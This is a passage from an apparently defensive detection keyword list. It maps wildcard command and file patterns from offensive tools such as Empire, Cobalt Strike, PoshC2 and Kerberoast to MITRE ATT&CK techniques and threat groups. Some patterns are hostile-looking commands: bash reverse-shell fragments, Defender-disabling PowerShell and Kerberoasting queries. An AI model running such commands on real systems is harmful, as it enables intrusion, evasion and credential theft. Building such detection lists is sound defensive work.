T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Set-MpPreference -DisableIOAVProtection $true*,greyware_tool_keyword,powershell,Disable scanning all downloaded files and attachments,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*Set-MpPreference -DisableRealtimeMonitoring $true*,greyware_tool_keyword,powershell,Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*Set-MpPreference -DisableRealtimeMonitoring *true*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Set-MpPreference -DisableScriptScanning 1 *,greyware_tool_keyword,powershell,Disable AMSI (set to 0 to enable),T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}*,offensive_tool_keyword,ProxyShell,Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207,T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505,TA0001 - TA0002 - TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation Tools,https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*setoolkit *,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,0,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*SetProcessInjection*encryptor.py*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*SetProcessInjection-main*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,1,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*set-pushover-applicationtoken*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*set-pushover-userkeys*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Set-RemotePSRemoting*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Set-RemoteWMI.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Set-ServiceBinPath*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*setspn -A HTTP/*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,0,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*setspn -T medin -Q */*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,0,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*setspn.exe -T medin -Q */*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,0,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*setthreadcontext.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*setthreadcontext.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*Setting up GFlags & SilentProcessExit settings in registry?*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*setuid_setgid.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*setup_apfell.sh*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*setup_obfuscate_xor_key*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*setup_reflective_loader*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Set-WorkingHours*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*seventeenman/CallBackDump*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*sfp_portscan_tcp.py*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*sfp_torexits.py*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*sftp *@*:* *,greyware_tool_keyword,sftp,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*sh >/dev/tcp/* <&1 2>&1*,greyware_tool_keyword,bash,Equation Group reverse shell method - simple bash reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*sh -c *ping -c 2 %s grep %s /proc/net/arp >/tmp/gx *,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*sh -i >& /dev/udp/*/* 0>&1*,greyware_tool_keyword,bash,bash reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*Sha-2-*512.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Sha-2-256.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Sha-2-384.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*shadawck/glit*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*shadawck/nse-install*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*shadawck/recon-archy*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*shadow_copy.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*shadowclock*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shadowclone *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shadowcoerce.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*shadowcoerce_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*shadowcopy enum*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*shadowdump.*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*ShadowForge.py*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*ShadowForgeC2-main*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*ShadowSpray recovered*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray.Asn1*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray.exe*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray.Kerb*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten 